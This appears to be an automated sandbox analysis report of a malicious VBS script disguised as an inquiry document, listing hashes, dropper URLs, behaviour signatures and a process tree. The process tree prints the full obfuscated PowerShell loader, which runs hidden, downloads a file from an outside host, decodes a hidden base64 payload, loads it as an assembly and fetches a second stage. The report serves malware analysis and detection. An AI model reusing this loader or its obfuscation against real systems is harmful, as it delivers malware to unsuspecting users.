Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10-11-2024 06:22

General

  • Target

    Inquiry HA-22-28199 22-077.vbs

  • Size

    12KB

  • MD5

    605abed3e1d7266ea35c8517b5961010

  • SHA1

    4c35a1a9e7385b8216812f3c6ff73b23b1710d18

  • SHA256

    394ce0420dc3786db150a630ceb90bac466bf4a3c3f1f792441fed6fb0b6dc34

  • SHA512

    15ff74ef09974c51a36cd4197c45c3391dd76317c2d278a34c9df5adf3cbee41f6fc9cf25450d73f3e6f4e63f00c0e65d874f6b572421bf49611544d11467bbc

  • SSDEEP

    192:bWyKzktunJRUyKzktJDlvgia0GONzU09iT0yFnVk03u3A/WeFW9tWHaFi:Cy44unfUy44dPlzNiKeFsin

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Inquiry HA-22-28199 22-077.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aQBuAHYAbwBrAGUALQBFAFgAUABSAEUAUwBzAGkATwBuACAAKAAoACcAZQBEAHkAaQBtAGEAZwBlAFUAcgBsACAAPQAgAEUANQByAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAJwArACcAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAyAEEAYQBfAGIAVwBvADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPACcAKwAnAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAJwArACcAOQBjADYAMgBjADEAJwArACcANwAzADAAOQA0ADUAMQA3ADYAYQAwADkAMAA0AGYAIABFADUAcgA7AGUARAAnACsAJwB5AHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBlAEQAeQBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAGUARAB5AHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABlAEQAeQBpAG0AYQBnAGUAVQByAGwAKQA7AGUARAB5AGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkACcAKwAnAGkAbgBnACcAKwAnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAGUARAB5AGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AGUARAB5AHMAdABhAHIAdABGAGwAYQBnACAAPQAgAEUANQByADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ARQA1AHIAOwBlAEQAeQBlAG4AZABGAGwAYQBnACAAPQAgAEUANQByADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBFADUAcgA7AGUARAB5AHMAdABhAHIAdABJAG4AZAAnACsAJwBlAHgAIAA9ACAAZQBEAHkAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAZQBEAHkAcwB0AGEAcgB0AEYAbABhAGcAKQA7AGUARAB5AGUAbgBkAEkAbgBkAGUAeAAgAD0AIABlAEQAeQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAJwArACcAbgBkAGUAeABPAGYAKABlAEQAeQBlAG4AZABGAGwAYQBnACkAOwBlAEQAeQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAnACsAJwAgAGUARAB5AGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJwArACcAZQAnACsAJwBEAHkAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGUARAB5AHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABlAEQAeQBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAZQBEAHkAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAZQBEAHkAZQBuAGQASQBuAGQAZQB4ACAALQAgAGUARAB5AHMAdABhAHIAdABJAG4AZABlAHgAOwBlAEQAeQBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAGUAJwArACcARAB5AGkAbQBhAGcAZQBUACcAKwAnAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABlAEQAeQBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABlAEQAeQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAZQBEAHkAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAZQBEAHkAJwArACcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABxAFoARwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABlAEQAeQBfACAAfQApAFsALQAxAC4ALgAtACgAZQBEAHkAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AGUARAAnACsAJwB5AGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAJwArACcAUwB0AHIAaQBuAGcAKABlAEQAeQBiAGEAcwAnACsAJwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AGUARAB5AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuACcAKwAnAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAZQBEAHkAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AGUARAB5AHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4AJwArACcASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABFADUAcgBWAEEASQBFADUAJwArACcAcgApADsAJwArACcAZQBEAHkAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAGUARAB5AG4AdQBsAGwALAAgAEAAKABFADUAcgB0AHgAdAAuAGQAcwB0AGUAcAAvAHAAbwBwAC8AdQBlAC4AcAByAGcAeABhAG0AeQBnAHIAZQBuAGUALgBnAGkAZwAvAC8AOgBwAHQAdABoAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAJwArACcAcgAxAEUANQByACwAIABFADUAcgBPAG4AZQBEAHIAaQB2AGUAUwBlAHQAdQBwAEUANQByACwARQA1AHIAZABlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsACAAJwArACcARQA1AHIAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsAEUANQByAGQAZQBzAGEAdABpAHYAYQBkAG8ARQA1AHIALABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwARQA1AHIAZABlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsAEUANQByADEARQA1AHIALABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACkAKQA7ACcAKQAuAFIAZQBQAEwAYQBDAGUAKAAoAFsAQwBIAEEAUgBdADYAOQArAFsAQwBIAEEAUgBdADUAMwArAFsAQwBIAEEAUgBdADEAMQA0ACkALABbAHMAVAByAGkATgBnAF0AWwBDAEgAQQBSAF0AMwA5ACkALgBSAGUAUABMAGEAQwBlACgAJwBxAFoARwAnACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBIAEEAUgBdADEAMgA0ACkALgBSAGUAUABMAGEAQwBlACgAKABbAEMASABBAFIAXQAxADAAMQArAFsAQwBIAEEAUgBdADYAOAArAFsAQwBIAEEAUgBdADEAMgAxACkALAAnACQAJwApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-EXPRESsiOn (('eDyimageUrl = E5rhttps://1017.filemail.com/ap'+'i/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcO'+'c_T35w&pk_vid=fd4f614bb20'+'9c62c1'+'730945176a0904f E5r;eD'+'ywebClient = New-Object System.Net.WebClient;eDyimageBytes = eDywebClient.DownloadData(eDyimageUrl);eDyimageText = [System.Text.Encod'+'ing'+']::UTF8.GetString(eDyimageBytes);eDystartFlag = E5r<<BASE64_START>>E5r;eDyendFlag = E5r<<BASE64_END>>E5r;eDystartInd'+'ex = eDyimageText.IndexOf(eDystartFlag);eDyendIndex = eDyimageText.I'+'ndexOf(eDyendFlag);eDysta'+'rtIndex -ge 0 -and'+' eDyendIndex -gt '+'e'+'DystartIndex;eDystartIndex += eDystartFlag.Length;eDybase64Length = eDyendIndex - eDystartIndex;eDybase64Command = e'+'DyimageT'+'ext.Substring(eDystartIndex, eDybase64Length);eDybase64Reversed = -join (eDy'+'base64Command.ToCharArray() qZG ForEach-Object { eDy_ })[-1..-(eDybase64Command.Length)];eD'+'yc'+'ommandBytes = [System.Convert]::FromBase64'+'String(eDybas'+'e64Reversed);eDyloadedAssembly = [System.Reflection.'+'Assembly]::Load(eDycommandBytes);eDyvaiMethod = [dnlib.IO.'+'Home].GetMethod(E5rVAIE5'+'r);'+'eDyvaiMethod.Invoke(eDynull, @(E5rtxt.dstep/pop/ue.prgxamygrene.gig//:ptthE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5'+'r1E5r, E5rOneDriveSetupE5r,E5rdesativadoE5r, '+'E5rd'+'esativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5r1E5r,E5rdesativadoE5r));').RePLaCe(([CHAR]69+[CHAR]53+[CHAR]114),[sTriNg][CHAR]39).RePLaCe('qZG',[sTriNg][CHAR]124).RePLaCe(([CHAR]101+[CHAR]68+[CHAR]121),'$'))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2768

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js

    Filesize

    1KB

    MD5

    ae40e08c0cba583f183151e7917d4947

    SHA1

    79bb3dd394e12d1e598b118ca29e60ad4eeb93b3

    SHA256

    b43098cd18ce70e863d2bf5807ea36f95e03c5128ed2442f5886ea4ed4c6927c

    SHA512

    5b4650fafda18f1fa194f4a0d0f30d8e06cfd86788852a47f7b105119da270206af389b034e47637e9eb21962645505ef9fb2645fbd42be775001cfa557ad598

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8F9A8R71UV3GSZ4RE4NQ.temp

    Filesize

    7KB

    MD5

    ec34e07bf983f9e9d692544fb8d8439b

    SHA1

    422128d4c7ef24c7eab864eb6ff939a595179337

    SHA256

    a40ac2f9c61a8f9a329328d6823f68d337335235c33f267d8368b471b16d3e50

    SHA512

    34719ed2d949d5f2ded8da37aef24f0ee7f6f2b72eab88974d31233a3a1badb62c316756ec8da26c5be4fed4242d795d9971fe756104010fdd3f0a141b035487

  • memory/2608-8-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/2608-9-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB